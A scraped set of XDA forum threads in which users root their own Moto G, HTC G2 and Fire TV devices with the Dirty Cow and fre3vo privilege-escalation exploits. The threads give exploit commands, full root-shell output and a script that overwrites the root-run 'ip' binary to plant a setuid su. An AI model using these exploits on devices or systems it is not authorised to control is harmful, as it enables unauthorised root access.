[XT1028 XT10XX] Lollipop - temporary root achieved ! - Moto G General

Thanks to @kryz who managed to generalize the Dirty Cow exploit, XT1028 now has a way to get temporary root : link. Notice that the /system will still be read-only, but at least full access to /data is available. Given the state of XT1028, this looks like a pretty good progress!
Steps to get temp root (in Lollipop):
1) install Croowt.apk, use the 2nd option in the menu : "Get root"
2) install SuperSu apk from the playstore (don't update the binary)
3) install RootChecker apk from the playstore
4) enjoy temporary root (until hard reboot)
The earlier post for Android 4.4.4:
For all KitKat holdouts, I've tried to use Dirty Cow and got temp root. Could work on other Android versions as well. Now, at least this root one does not seem to crash as much (unlike Kingroot). Here is a brief set of steps. First, download this package:
https://mega.nz/#!LFlBRAhS!rDl7PJMkFq7HqUDDgbKV6ddv-C3qkQIJl_CJkhkx2sc
Then
Code:
adb push dirtycow /data/local/tmp
adb push cow-execute /data/local/tmp
adb shell
cd /data/local/tmp
chmod 0777 *
[email protected]_cdma:/data/local/tmp $ ./dirtycow /system/bin/run-as ./cow-execute
bin/run-as ./cow-execute <
warning: new file size (13728) and file old size (9432) differ
size 13728
[] mmap 0xb6e64000
[] exploit (patch)
[] currently 0xb6e64000=464c457f
[] madvise = 0xb6e64000 13728
[] madvise = 0 1048576
[] /proc/self/mem 0 1048576
[] exploited 0xb6e64000=464c457f
[email protected]_cdma:/data/local/tmp $ run-as -exec id
run-as -exec id
Current uid: 2000
Setting capabilities
Attempting to escalate to root
Current uid: 0
Executing: 'id' with 0 arguments
uid=0(root) gid=0(root) groups=1003(graphics),1004(input),1007(log),1011(adb),10
15(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net
_bw_stats) context=u:r:runas:s0
[email protected]_cdma:/data/local/tmp $ run-as -exec sh
run-as -exec sh
Current uid: 2000
Setting capabilities
Attempting to escalate to root
Current uid: 0
Executing: 'sh' with 0 arguments
[email protected]_cdma:/data/local/tmp #
Not sure how much one can do here without bootloader unlock though ...

Tried it on my Cricket Wireless XT1045 which has been stuck on 4.4.4 without any kind of root for a while now and it worked as shown in your post. Hopefully it'll be a stepping stone to some more permanent kind of root, maybe even something that can be used with Sunshine to unlock the bootloader.

linuxgator said:
Tried it on my Cricket Wireless XT1045 which has been stuck on 4.4.4 without any kind of root for a while now and it worked as shown in your post. Hopefully it'll be a stepping stone to some more permanent kind of root, maybe even something that can be used with Sunshine to unlock the bootloader.
Click to expand...
Click to collapse
Try this, see if you can copy su binary to system (it will disappear after reboot) :
http://android.stackexchange.com/questions/127230/android-adb-has-root-access-but-no-su-binary
Then soft reboot to make it work, in root shell type :
killall zygote
The hope is to get you SuperSu (until next reboot). I believe we are probably back to where these phones were with the old Pie exploit:
http://forum.xda-developers.com/moto-x/orig-development/root-4-4-x-pie-motorola-devices-t2771623
Kingroot used to be able to make a fake copy of itself into /system which disappeared soon after.
I have this stupid Watcher on my phone, and don't want to try these other steps since I don't want it to kill my corporate email ...

Updated with the new Lollipop instructions!
@linuxgator

Nice link down

@bibikalka any chance you can post the kitkat version again?

Related

G2 2.3.4 OTA 1-Click temp-root

Thanks for the move orb3000
EDIT:
Apparently I can't post links either... what gives??? Going to have to do this the ghetto way I guess..
Anyway, I made a nice little .bat to temp-root the 2.3.4 OTA for the T-Mobile G2 (HTC Vision) for all you lazy people out there, or the people who are just tired of playing with the cmd (like myself).
It's on media fire... www(dot)mediafire(dot)com/?xwurdlpcw61oxiz
Just unzip and run "rootg2.bat"
It uses fre3vo, as it is the only method that currently works. If this for some reason does NOT work for you, edit rootg2.bat and change the address set to one of the following after a reboot
FAA90000 -end FFFFFFFF
10000000 -end 1FFFFFFF
20000000 -end 2FFFFFFF
30000000 -end 3FFFFFFF
F0000000 -end FFFFFFFF
E0000000 -end EFFFFFFF
Find one that works?? Great! Now you have a bat juuuuuust for you.
Long time lurker, first time poster, micro sized developer.
how to install
hi, i'm not very good with this. can you let me know how to install the g2root file on my g2? by the way, is this a permanent root? thx
tntx said:
hi, i'm not very good with this. can you let me know how to install the g2root file on my g2? by the way, is this a permanent root? thx
Click to expand...
Click to collapse
It says in the title this is a temporary root, not permanent. Check the [REF] Sticky is either General or Development for guides that will help you through the proces. DO NOT attempt root until you are sure you know what you are doing. READ and SEARCH!
Does anyone know of a way to temp-root on-device, without having to hook up to a PC?
After the message "daemon started successfully" the adb just hangs at that line, no crash, just doesn't advance any further. I can't input any commands either. I waited for over an hour to see if it would proceed, but not as such. Any ideas?
RebelScum75 said:
Does anyone know of a way to temp-root on-device, without having to hook up to a PC?
Click to expand...
Click to collapse
Hi!
I know that there is none
Have fun - Guhl
will this also work for the desire z ?
no dude ive been looking forever "finally had a reason to root the darn thing but i dont think there is one at least not that i have found--i work for verizon now anyways left my tmo--lol-----
dianlb50 said:
will this also work for the desire z ?
Click to expand...
Click to collapse
yes, basically same phone
Did this work for anyone?
Sent from my T-Mobile G2 using XDA App
I'm having issues getting this to work. I have tried the various addresses with no solid confirmation of whether it worked or not, aside from running the app "Root Check" or attempting to use an app that requires root, and finding that the phone is indeed, not rooted.
The results vary however at best, the process appears to have gone through smoothly. Daemon was successful, it successfully locates the region, and finally successfully dismounts and and remounts, which leaves us at the stage where it says press any key to continue.
Are there additional steps? What conditions must be met in order for this to work other than turning on debugging mode? Must the usb cord remain connected? Does the temp root end once the cord is unplugged? The guide above didn't exactly give any clear cut step-by-step directions and so I am feeling as if I'm not doing something because the guide doesn't mention it.
Can someone who has successfully temp-rooted their G2 v2.3.4 post a list of steps needed from start to finish? Example:
1) Enable USB debugging on phone.
2) Plug phone into computer via USB cord.
3) Unzip g2root.zip into a folder of your choice.
4) Run g2root.bat.
5) If successful, you will see (fill in the blank)
6) If successful, go to step 7, if unsuccessful, reboot computer/phone and retry step 1
Something like the above direct would be extremely useful to a few of us. Thanks!
-HobbesG2
Hello, I think this is my first post over here.
enable usb debugging on the phone
Plug phone into computer via USB
kill adb if it is already running:
Code:
./adb kill-server
start adb server as root:
Code:
sudo ./adb start-server
sample output:
Code:
* daemon not running. starting it now on port 5037 *
* daemon started successfully *
Code:
./adb wait-for-device
and wait for this command to exit
Code:
./adb push /PUT/PATH/TO/G2ROOT/HERE/fre3vo /data/local/tmp
sample output:
Code:
218 KB/s (9796 bytes in 0.043s)
Code:
./adb -d shell chmod 777 /data/local/tmp/fre3vo
Code:
./adb -d shell /data/local/tmp/fre3vo -debug -start fb040000 -end FFFFFFFF
sample output:
Code:
fre3vo by #teamwin
Please wait...
Attempting to modify ro.secure property...
fb_fix_screeninfo:
id: msmfb
smem_start: 2fd00000
smem_len: 300000
type: 0
type_aux: 0
visual: 2
xpanstep: 0
ypanstep: 1
line_length: 1920
mmio_start: 0
accel: 0
fb_var_screeninfo:
xres: 480
yres: 800
xres_virtual: 480
yres_virtual: 1600
xoffset: 0
yoffset: 0
bits_per_pixel: 32
activate: 16
height: 80
width: 48
rotate: 0
grayscale: 0
nonstd: 0
accel_flags: 0
pixclock: 0
left_margin: 0
right_margin: 0
upper_margin: 0
lower_margin: 0
hsync_len: 0
vsync_len: 0
sync: 0
vmode: 0
Frame Buffer handle: 4
Buffer offset: 002ee000
Buffer size: 8192
Scanning region fb040000...
Scanning region fb130000...
Scanning region fb220000...
Scanning region fb310000...
Scanning region fb400000...
Scanning region fb4f0000...
Scanning region fb5e0000...
Scanning region fb6d0000...
Scanning region fb7c0000...
Scanning region fb8b0000...
Scanning region fb9a0000...
Scanning region fba90000...
Potential exploit area found at address fbb54e00:1200.
Exploiting device...
Code:
adb wait-for-device
Code:
./adb -d remount
sample output:
Code:
remount succeeded
verify you have root:
Code:
./adb -d shell id
output:
Code:
uid=0(root) gid=0(root)
Or you could verify it worked by executing 'adb shell' and if you have a # prompt rather than $, it worked.
This will stick until you reboot. Unplugging the cable will not affect it (unless you're currently running the commands)
This is not exactly a true temp-root, as it just gives adb root access, but you should be able to remount /system as rw and push su and SuperUser.apk to the right places to get a proper temp-root.
-Nipqer
Nipqer said:
you should be able to remount /system as rw and push su and SuperUser.apk to the right places to get a proper temp-root.
Click to expand...
Click to collapse
could you please describe how to do that? where do i get these packages from?
Getting closer but still not quite there. The reason why I was not having confirmations before was because I was running the rootg2.bat file directly rather than doing it through the cmd prompt, aka Start --> Run --> [type cmd]. After having ran the .bat file via the cmd prompt, I was able to apply, and confirm via the steps that were mentioned.
Problem is, I'm still not exactly truly temp-rooted, as none of my apps that require root or are designed to check root, show me as rooted. Is this because superuser and/or busybox are not operating as if they are rooted due to something I'm not aware of?
I already have the latest Superuser/Elite and BusyBox installed onto my phone via the Market. Do I have to push them into a specific folder that simply installing them from market wont do automatically?
Any thoughts?
After I get this nailed down, I will write a comprehensive explaination for others to do this as well.
Here is a true temp-root which works with fre3vo.
Just read the readme file.
-Nipqer
any update on this one?
i hope this makes rooting easier...
Nipqer said:
Here is a true temp-root which works with fre3vo.
Just read the readme file.
-Nipqer
Click to expand...
Click to collapse
I see this method listed for the Sensation, has it been proven to work for G2, stock OTA 2.3.4?
Wondering the same.
If you are running 2.3.x, and use fre3vo, then run that zip I posted, you will have proper temp-root.
It will stick until a reboot, but then you can just redo everything.
Yes it's proven to work.
-Nipqer

[GUIDE] How to get root/flash custom roms with HTCDEV unlock

I know some people out there will use the new "official" htcdev.com unlock option for the G2/DZ, but they will still need to do **** to get root or flash custom roms.
I REALLY RECOMMEND USING THE XDA METHOD OF ACQUIRING ROOT AND S-OFF
S-OFF is possible! We can relock the bootloader to allow a downgrade
Go to FASTBOOT USB mode (where you got the unlock token code, and unlocked the bootloader)
Code:
fastboot oem lock
You can then downgrade by following this guide
And get S-OFF with this guide
DO NOT LOCK THE BOOTLOADER IF YOU DON'T WANT TO ROOT PROPERLY!
LOCKING THE BOOTLOADER WILL CAUSE THE REST OF THIS GUIDE TO FAIL!
-------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------
First, some background as to why these methods are needed.
The HTC 'official' unlock method lets /system be written (given root access) in any mode.
The boot partition, and recovery are only writeable in fastboot mode though. So we need to flash a recovery through fastboot, flash a custom rom, then flash its boot image to be able to boot it.
GAINING ROOT ON STOCK ROM
Gaining Temp Root
DHD USERS WITH SENSE 3.x WILL HAVE TO USE TACOROOT
1. Download the attached files, unzip them, and place the files in your platform-tools folder. To elaborate, place the fre3vo file inside of the fre3vo.zip file in your platform-tools directory.
2. Run the following command to verify the exploit has access to what it needs. (Only the first line is the command. The second line should be the result returned if all goes well.)
Code:
> adb shell cat /dev/msm_rotator
[I]/dev/msm_rotator: invalid length[/I]
4. If you received the same message, you're good to continue on. If not... I'd recommend going back to #g2root and asking them. (I am just passing along the information after all).
5. Run the following commands from your platform-tools directory.
Code:
> adb push fre3vo /data/local/tmp
> adb shell
$ chmod 777 /data/local/tmp/fre3vo
$ /data/local/tmp/fre3vo -debug -start FAA90000 -end FFFFFFFF
6. After you enter that command, with luck you should see something similar to the last few lines in the following displayed. (It may take a minute or two. From what I can tell, this appears to be the quickest method as the exploit seems to be found in the latter regions.)
Code:
[I]Buffer offset: 00000000
Buffer size: 8192
Scanning region fb7b0000...
Scanning region fb8a0000...
Scanning region fb990000...
Scanning region fba90000...
Potential exploit area found at address fbb4d600:a00.
Exploiting device...[/I]
7. If you did get kicked out of adb shell, open it again. You should now see the lovely # instead of $, thus granting you temp root. Go ahead and exit out of shell to proceed to the next stage.
Code:
> adb shell
# exit
Getting Perm-Root
1. Download the attached file, "Vision-fre3vo-temp-root.zip".
2. Extract the contents to your platform-tools directory.
3. Run the following commands in command prompt while in platform-tools directory:
Code:
> adb push su /data/local/tmp/
> adb push busybox /data/local/tmp/
> adb push fixsu.sh /data/local/tmp/
> adb install SuperUser.apk
> adb shell chmod 755 /data/local/tmp/fixsu.sh
> adb shell chmod 755 /data/local/tmp/busybox
> adb shell /data/local/tmp/fixsu.sh
Note: If you get permission denied errors on busybox when trying to run fixsu.sh, please let me know.
4. Reboot phone, you should now have perm-root.
FLASHING A CUSTOM ROM
Flashing a custom recovery
Note: this only needs to be done once
1. Download a custom recovery: Latest Clockworkmod, Clockworkmod Touch, 4ext Touch
2. Place the recovery img in the folder with fastboot.exe (which you used to unlock your device), rename the recovery to recovery.img
3. Reboot phone to fastboot mode: Either pull battery and hold TRACKPAD and press power, or run 'adb reboot bootloader' from a cmd/terminal
4. Run
Code:
> fastboot flash recovery recovery.img
[I]sending 'recovery' (4930 KB)...
OKAY [ 0.851s]
writing 'recovery'...
OKAY [ 0.819s]
finished. total time: 1.670s[/I]
Flashing a custom rom
1. Download the rom.zip you wish to run.
2. Extract boot.img from the zip and place it in the folder with fastboot.
3. Copy the rom.zip to your sdcard
4. Flash the rom.zip from your sdcard
5. Reboot to fastboot mode (as above)
6. Run from a cmd/terminal
Code:
> fastboot flash boot boot.img
[I]sending 'boot' (4096 KB)...
OKAY [ 0.711s]
writing 'boot'...
OKAY [ 1.085s]
finished. total time: 1.798s[/I]
7. Reboot, you will now have a custom rom!
Credits:
Setherio, seeing as I ripped off half his guide.
Pierre_ja, helping figure out how to go about this.
If you get stuck with any of this, join #G2ROOT on freenode
-Nipqer
I'll try this ASAP. This bootloader have only brought me a **** load of headache, hope this works..
Thanks!
Yay a tester. let me know how it works.
We've had 1 person get root, and 2 flash custom roms with this, but I'd appreciate any feedback.
-Nipqer
fixsu.sh permissions denied
good to know that xda has people like you to help out
couldn't get root here's the result
C:\Android SDK\android-sdk\platform-tools>adb shell cat /dev/msm_rotator
/dev/msm_rotator: invalid length
C:\Android SDK\android-sdk\platform-tools>adb push fre3vo /data/local/tmp
869 KB/s (9796 bytes in 0.011s)
C:\Android SDK\android-sdk\platform-tools>adb shell
$ chmod 777 /data/local/tmp
chmod 777 /data/local/tmp
$ chmod 777 /data/local/tmp/fre3vo
chmod 777 /data/local/tmp/fre3vo
$ /data/local//tmp/fre3vo -debug -start FAA90000 -end FFFFFFFF
/data/local//tmp/fre3vo -debug -start FAA90000 -end FFFFFFFF
fre3vo by #teamwin
Please wait...
Attempting to modify ro.secure property...
fb_fix_screeninfo:
id: msmfb
smem_start: 802160640
smem_len: 3145728
type: 0
type_aux: 0
visual: 2
xpanstep: 0
ypanstep: 1
line_length: 1920
mmio_start: 0
accel: 0
fb_var_screeninfo:
xres: 480
yres: 800
xres_virtual: 480
yres_virtual: 1600
xoffset: 0
yoffset: 0
bits_per_pixel: 32
activate: 16
height: 80
width: 48
rotate: 0
grayscale: 0
nonstd: 0
accel_flags: 0
pixclock: 0
left_margin: 0
right_margin: 0
upper_margin: 0
lower_margin: 0
hsync_len: 0
vsync_len: 0
sync: 0
vmode: 0
Buffer offset: 00000000
Buffer size: 8192
Scanning region faa90000...
Scanning region fab80000...
Scanning region fac70000...
Scanning region fad60000...
Scanning region fae50000...
Scanning region faf40000...
Scanning region fb030000...
Scanning region fb120000...
Scanning region fb210000...
Scanning region fb300000...
Scanning region fb3f0000...
Scanning region fb4e0000...
Scanning region fb5d0000...
Scanning region fb6c0000...
Scanning region fb7b0000...
Scanning region fb8a0000...
Scanning region fb990000...
Scanning region fba80000...
Potential exploit area found at address fbb6e200:e00.
Exploiting device...
C:\Android SDK\android-sdk\platform-tools>adb shell
# exit
exit
C:\Android SDK\android-sdk\platform-tools>adb push su /data/local/tmp/
1205 KB/s (22228 bytes in 0.018s)
C:\Android SDK\android-sdk\platform-tools>adb push busybox /data/local/tmp/
1683 KB/s (1372660 bytes in 0.796s)
C:\Android SDK\android-sdk\platform-tools>adb push fixsu.sh /data/local/tmp/
109 KB/s (560 bytes in 0.005s)
C:\Android SDK\android-sdk\platform-tools>adb install Superuser.apk
1060 KB/s (196521 bytes in 0.181s)
pkg: /data/local/tmp/Superuser.apk
Success
C:\Android SDK\android-sdk\platform-tools>adb shell chmod 755 /data/local/tmp/fi
xsu.sh
C:\Android SDK\android-sdk\platform-tools>adb shell /data/local/tmp/fixsu.sh
/data/local/tmp/fixsu.sh: /data/local/tmp/busybox: permission denied
/data/local/tmp/fixsu.sh: /data/local/tmp/busybox: permission denied
/data/local/tmp/fixsu.sh: /data/local/tmp/busybox: permission denied
/data/local/tmp/fixsu.sh: /data/local/tmp/busybox: permission denied
C:\Android SDK\android-sdk\platform-tools>adb shell chmod 755 /data/local/tmp/fi
xsu.sh
C:\Android SDK\android-sdk\platform-tools>adb shell /data/local/tmp/fixsu.sh
/data/local/tmp/fixsu.sh: /data/local/tmp/busybox: permission denied
/data/local/tmp/fixsu.sh: /data/local/tmp/busybox: permission denied
/data/local/tmp/fixsu.sh: /data/local/tmp/busybox: permission denied
/data/local/tmp/fixsu.sh: /data/local/tmp/busybox: permission denied
C:\Android SDK\android-sdk\platform-tools>
Click to expand...
Click to collapse
Hmm, I wonder why thats happening...
Want to join the IRC channel so we can sort this out?
-Nipqer
how do i join?
EDIT: i'll do a full factory restore, format sdcard and try this out again
Go to http://webchat.freenode.net/
choose a nickname, in channels enter #G2ROOT (with the hash)
-Nipqer
Hi Guys.
I'm @ work, but gonna try this in my break asap.
Sorry if I have missed something, but don't you need the eng hboot in order to use "fastboot flash" ?
Sent from my Desire Z running CM7.
I've done everything as above.
Everything went just fine.
But when I start SetCPU, It comes up with "root acces not detected" did you allow setcpu through superuser permissions?
In the superuser app (which is visible) I can't edit anything?
Also, it's not showing a pop up with "allow"
Am I doing something wrong?
C:\>cd android
C:\Android>cd platform-tools
C:\Android\platform-tools>adb shell
adb server is out of date. killing...
* daemon started successfully *
$ fastboot flash recovery recovery.img
fastboot flash recovery recovery.img
fastboot: permission denied
$
$ exit
exit
C:\Android\platform-tools>fastboot flash recovery recovery.img
< waiting for device >
steviewevie said:
Sorry if I have missed something, but don't you need the eng hboot in order to use "fastboot flash" ?
Sent from my Desire Z running CM7.
Click to expand...
Click to collapse
the hboot htc provides for the unlock supports fastboot commands, took us a while to figure that out at #g2root.
---------- Post added at 05:11 PM ---------- Previous post was at 05:08 PM ----------
wm6.5 said:
C:\>cd android
C:\Android>cd platform-tools
C:\Android\platform-tools>adb shell
adb server is out of date. killing...
* daemon started successfully *
$ fastboot flash recovery recovery.img
fastboot flash recovery recovery.img
fastboot: permission denied
$
$ exit
exit
C:\Android\platform-tools>fastboot flash recovery recovery.img
< waiting for device >
Click to expand...
Click to collapse
you have to boot in fastboot mode to be able to issue fastboot commands:
from shell ($ or #) while the phone is connected to the computer:
Code:
exit
adb reboot bootloader
from normal win cmd (the > prompt):
Code:
adb reboot bootloader
petarpLab said:
the hboot htc provides for the unlock supports fastboot commands, took us a while to figure that out at #g2root.
Click to expand...
Click to collapse
Ok, cool, thanks for the info. That's something useful it does then.
Sent from my Desire Z running CM7.
wm6.5 said:
C:\>cd android
C:\Android>cd platform-tools
C:\Android\platform-tools>adb shell
adb server is out of date. killing...
* daemon started successfully *
$ fastboot flash recovery recovery.img
fastboot flash recovery recovery.img
fastboot: permission denied
$
$ exit
exit
Click to expand...
Click to collapse
You need to run fastboot from your PC, not the phone
Sent from my Desire Z running CM7.
wm6.5: I don't know if SetCPU can work on stock roms with root. You might need a different kernel for it.
-Nipqer
Nipqer said:
Yay a tester. let me know how it works.
We've had 1 person get root, and 2 flash custom roms with this, but I'd appreciate any feedback.
-Nipqer
Click to expand...
Click to collapse
You sir, just made my day!
Guide works like a charm! thank you!
Nipqer, thanks Mate.
Got everything sorted out on G2root on irc!
Your guide is the .... thanks again!
Thanks this saved me! The guys on g2root irc are way too helpful! Much thanks to them, no thanks to HTC unlocker for wasting a day of my life.
Is there any way of getting S-Off after you've used the HTC Dev Unlock?
No, not yet. As soon as we have figured out a way I'll update the OP.
-Nipqer

SuperSU not autostarting

Hello, I hope someone has seen this before. I am not sure how I managed to break S7, as it was working, initially. I am running PE1 firmware, and factory reset before following the root guide, in the verizon guide forums. But now I have the problem where supersu will not auto start on bootup. I have to connect the usb cable to my pc, and use adb and manually start it. Root and Supersu are loaded. The only thing I have to run is:
C:\adb\adb.exe shell /system/etc/launch_daemonsu.sh
Then disconnect the usb cable, and all is well. Everything seems to be correct. What am I missing? I really do not want to start completely over. I have run the verizon debloat v2 and v8. I had to manually start supersu to flashfire the v8 script. Also in the same guide. All the root checker apps will see that you have root, but they say you are missing a super user app.
C:\adb\adb.exe shell /system/etc/launch_daemonsu.sh
mkdir: '/su': File exists
cp: /cache/stock_boot_*: No such file or directory
cp: bad '/cache/stock_boot_*': No such file or directory
/data/su.img: recovering journal
ext2fs_close2 : fs->write_bitmaps is null
ext2fs_close2 : normal operation, return 0
skipping journal recoverybecause INCOMPAT_RECOVER was clear.
check whether gdt & bitmap free count is vaild
/data/su.img: clean, 25/2048 files, 1399/8192 blocks
ext2fs_close2 : fs->write_bitmaps is null
ext2fs_close2 : normal operation, return 0
mount: No such file or directory
mount: No such file or directory
supolicy v2.74 (ndk:arm64-v8a) - Copyright (C) 2014-2016 - Chainfire
Patching policy ...
(Android M policy compatibility mode)
- Success
<Then disconnect the usb cable, supersu will work fine now.>
C:\adb>adb shell cat /system/etc/init.sec.boot.sh
#!/system/bin/sh
echo "init.sec.boot.sh: start" > /dev/kmsg
# start deferred initcalls
cat /proc/deferred_initcalls
## strace for system_server
#str=""
#while [ "$str" = "" ]; do
# str=`ps | grep system_server`
# sleep 0.1
#done
#
#pid=${str:10:4}
#echo "init.sec.boot.sh: strace -tt -T -o /data/log/strace.txt -p ${pid}" > /dev/kmsg
#strace -tt -T -o /data/log/strace.txt -p ${pid}
/system/etc/launch_daemonsu.sh
/data/s7startup/startupscript.sh
C:\adb>adb shell ls -la /system/etc/launch_daemonsu.sh
-rwx------ root root 4686 2016-07-03 13:32 launch_daemonsu.sh
Thanks again.
Did you push the supersu app to you device?
Is that to say uve got supersu installed but it won't start? If that's so I would check the box for start supersu during bootup. Unless im just completely missing your issue and im sorry if I am.

[GUIDE] I Rooted my Fire TV via dirtycow

Hi,
i just rooted my Fire TV 1 (version 51.1.4.0) via dirtycow, and I wanted to share my experience. (Unfortunately I cannot post external Links here)
Dirtycow allows you to write to files, even if you have no permission to do so. Unfortunately there is no binary on the system with the suid bit set, so I could not replace this binary. (Other attempts on other Android devices replaced the run-as binary. This is not possible here). Another problem was, that the modification only last for the current boot, so I could not just modify boot scripts. I had to find a binary, that is executed as root while the system is running, preferably on demand. This binary is ip. Every time one modifies the network settings in the Fire TV gui, ip is executed as root. Yay. With that in mind, I replaced ip with a shell script, that deploys the su binary.
This is what I did:
I compiled the dirtycow.c from timwr GitHub Repository CVE-2016-5195
Then I put the resulting binary into /data/local/tmp on my Firetv (via adb)
Now I pushed chainfires su binary to /data/local/tmp
I copied the /system/bin/ip binary to /data/local/tmp
I wrote this shell script, pushed it to /data/local/tmp and marked it executable (755)
Code:
#!/system/bin/sh
mount -o remount,rw /system
cp /data/local/tmp/su /system/xbin
chmod 4755 /system/xbin/su
/data/local/tmp/ip "[email protected]"
After that, I used dirtycow to replace ip with my new ip script (./dirtycow /system/bin/ip ip_script) [This may take a while]
Now I went to my network settings of my Fire TV and changed them to a static ip address.
I reconnected to my amazon Fire tv and typed su
Code:
[email protected]:/ $ su
[email protected]:/ #
Lastly I installed the Supersu.apk from chainfire
Root seems to work with the adb shell and the terminal app. Somehow it does not with amaze file manager. If I start it I get thrown into the amazon fire ui.
This rooting method should also work for other versions of the fireOS, though I have not tested them.
Can you downgrade with being in the root state?
sconnyuk said:
Can you downgrade with being in the root state?
Click to expand...
Click to collapse
Yes. After rooting, I downgraded to 5.1.0.2 and did a full bootloader unlock. I am now running a rooted 5.2.1.1
christofsteel said:
Yes. After rooting, I downgraded to 5.1.0.2 and did a full bootloader unlock. I am now running a rooted 5.2.1.1
Click to expand...
Click to collapse
Will have to try this for fire stick.
Excellent find, ive been watching the dirtycow and this will come in handy if it works for fire stick.
sconnyuk said:
Will have to try this for fire stick.
Excellent find, ive been watching the dirtycow and this will come in handy if it works for fire stick.
Click to expand...
Click to collapse
Please report back
I think it is important to note, that I configured a static ip address to trigger the ip script. Root is permanent btw. as soon as the su binary is deployed, you can reboot all you like.
firetv have selinux? what version linux is it?
christianrodher said:
firetv have selinux? what version linux is it?
Click to expand...
Click to collapse
I thought I read somewhere, that FireOS 5 had SELinux. I could not check, because I still ran FireOS 3. Seems like it does not have SELinux. I will remove the remark from my initial post.
christofsteel said:
I thought I read somewhere, that FireOS 5 had SELinux. I could not check, because I still ran FireOS 3. Seems like it does not have SELinux. I will remove the remark from my initial post.
Click to expand...
Click to collapse
can you double check if sepolicy is present or something similar?
christianrodher said:
can you double check if sepolicy is present or something similar?
Click to expand...
Click to collapse
Ok. In my FireOS version 5.2.1.1 there is SELinux activated and enforcing. In FireOS version 51.1.0.4 there was none. But I do not know if that hinders the rooting process.
christofsteel said:
Ok. In my FireOS version 5.2.1.1 there is SELinux activated and enforcing. In FireOS version 51.1.0.4 there was none. But I do not know if that hinders the rooting process.
Click to expand...
Click to collapse
ok so when you do the exploit u where at selinux enforcing.... ok if is that simple after weve been working our asses here https://github.com/timwr/CVE-2016-5195/issues/9 im going to break the pc and the cell phone lol
@christianrodher No worries, I doubt this is the universal solution! I think it's that the TV runs `ip` with a really lenient SELinux context for some stupidly weird reason.
christianrodher said:
ok so when you do the exploit u where at selinux enforcing.... ok if is that simple after weve been working our asses here https://github.com/timwr/CVE-2016-5195/issues/9 im going to break the pc and the cell phone lol
Click to expand...
Click to collapse
No I did the exploit on my FireOS version 51.1.0.4. Afaik there was no SELinux present. SELinux is present in FireOS version 5.2.1.1. I can test, if this exlploit works on my now updated Fire TV.
Edit: It did not work I could not mount system read write. Seems like it only works for FireOS 3
Really tried to get this to work. I think I'm close. I saw SELinux complain about the file size so I did some padding. Here's where I'm at
187594885]
I/Kernel ( 163): [ 1503.059370] (0)[163:healthd]healthd: battery l=100 v=4200
t=2.2 h=2 st=5 chg=u
W/linker (10431): ./dirtycow: unused DT entry: type 0x6ffffffe arg 0x600
W/linker (10431): ./dirtycow: unused DT entry: type 0x6fffffff arg 0x1
I/exploit (10431): size 223296
I/exploit (10431):
I/exploit (10431): [*] mmap 0xf7546000
I/exploit (10431): [*] exploit (patch)
I/exploit (10431): [*] currently 0xf7546000=464c457f
I/exploit (10431): [*] madvise = 0xf7546000 223296
I/Kernel ( 0): [ 1509.432532]-(2)[0:swapper/2]CPU2: Booted secondary process
or
I/Kernel ( 0): [ 1509.437302]-(3)[0:swapper/3]CPU3: Booted secondary process
or
I/Kernel ( 87): [ 1509.437743] (0)[87:hps_main][HPS] (0004)(1)(0)action end(2
7)(35)(0)(2) (2)(2)(2)(2)(2)(2)(2)(2)(1)(0) (6)(230)(0) (0)(0)(0) (0)(6)(230)(0)
(6)
I/exploit (10431): [*] madvise = 0 1048576
I/Kernel ( 0): [ 1511.439231]-(1)[0:swapper/1]CPU1: Booted secondary process
or
I/Kernel ( 87): [ 1511.440339] (0)[87:hps_main]CPU3: shutdown
I/Kernel ( 87): [ 1511.440873] (0)[87:hps_main][HPS] (0800)(1)(2)action end(1
05)(102)(0)(1) (2)(2)(2)(2)(2)(2)(2)(2)(1)(0) (105)(10)(0) (1666)(10)(0) (0)(102
)(10)(0)(102)
I/exploit (10431): [*] /proc/self/mem -1048576 1048576
I/exploit (10431): [*] exploited 0xf7546000=464c457f
I/art ( 501): Background partial concurrent mark sweep GC freed 256902(12MB
) AllocSpace objects, 15(2MB) LOS objects, 33% free, 20MB/31MB, paused 690us tot
al 136.802ms
E/WifiStateMachine( 501): WifiStateMachine CMD_START_SCAN source -2 txSuccessRa
te=50.64 rxSuccessRate=38.79 targetRoamBSSID=58:6d:8f:09:b7:37 RSSI=-39
E/WifiStateMachine( 501): WifiStateMachine L2Connected CMD_START_SCAN source -2
93, 94 ignore because P2P is connected
I/Kernel ( 87): [ 1513.438566] (0)[87:hps_main]CPU2: shutdown
I/Kernel ( 87): [ 1513.439651] (0)[87:hps_main][HPS] (0400)(2)(1)action end(7
)(4)(0)(0) (2)(2)(2)(2)(2)(2)(2)(2)(1)(0) (7)(10)(0) (288)(10)(0) (0)(4)(10)(0)(
4)
I/Kernel ( 87): [ 1515.438476] (0)[87:hps_main]CPU1: shutdown
I/Kernel ( 87): [ 1515.439146] (0)[87:hps_main][HPS] (0200)(2)(0)action end(4
)(3)(0)(0) (2)(2)(2)(2)(2)(2)(2)(2)(1)(0) (4)(10)(0) (46)(10)(0) (0)(3)(10)(0)(3
)
I/Kernel ( 119): [ 1521.197537] (0)[119:wdtk-0]wdk: [WDK], local_bit:0x1, cpu:
0, check_bit:0x1, RT[1521197519702]
I/Kernel ( 119): [ 1521.197575] (0)[119:wdtk-0]wdk: [WDK]: kick Ex WDT,RT[1521
197568471]
E/WifiStateMachine( 501): WifiStateMachine CMD_START_SCAN source -2 txSuccessRa
te=3.98 rxSuccessRate=3.61 targetRoamBSSID=58:6d:8f:09:b7:37 RSSI=-39
E/WifiStateMachine( 501): WifiStateMachine L2Connected CMD_START_SCAN source -2
94, 95 ignore because P2P is connected
^C
C:\Program Files (x86)\Minimal ADB and Fastboot>
130|[email protected]:/data/local/tmp $ getenforce
Enforcing
130|[email protected]:/data/local/tmp $ getenforce
Enforcing
I have an AFTV2 running latest firmware. I also noticed chainfires su binary i had was 32bit so I grabbed a 64bit one. Still no dice
[email protected]:/data/local/tmp $ ls -la
-rwxrwxrwx shell shell 13776 2016-10-31 17:43 dirtycow
-rwxrwxrwx shell shell 223296 2016-10-31 18:27 ip
-rwxrwxrwx shell shell 223296 2016-10-31 19:48 ip_script
-rwxrwxrwx shell shell 108480 2016-10-31 19:39 su
[email protected]:/data/local/tmp $
Hopes this helps someone
I've reached Step 3, I don't understand what you mean by su binary, as in, the whole flashable zip of supersu? or something else? Could you please explain? Thank you
Edit: Before I carry on, I was attempting this on the fire tv *Stick* instead of the box, running 5.2.1.1 would it still work?
VastVenomm said:
